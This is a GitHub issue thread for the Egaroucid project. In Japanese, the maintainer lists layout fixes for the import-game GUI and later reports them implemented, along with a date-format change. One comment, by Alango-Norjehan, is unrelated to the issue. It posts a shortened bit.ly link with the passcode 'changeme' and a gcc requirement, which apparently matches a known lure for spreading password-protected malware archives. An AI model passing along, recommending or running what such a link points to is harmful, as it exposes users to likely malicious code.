### ISSUE TITLE
Improve Import Game GUI

### ISSUE THREAD

**Issue by Nyanyan** [Nyanyan/Egaroucid#330]
対局読み込みのGUIをきれいにする

- 上段の中心ラインを揃える
- スコア表示の左右寄せをきれいにする
- 長い名前・メモに対する処理

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Nyanyan** [comment]
実装完了

**Comment by Nyanyan** [comment]
日付の表示をYYYY_MM_DDではなくYYYY/MM/DDに変更
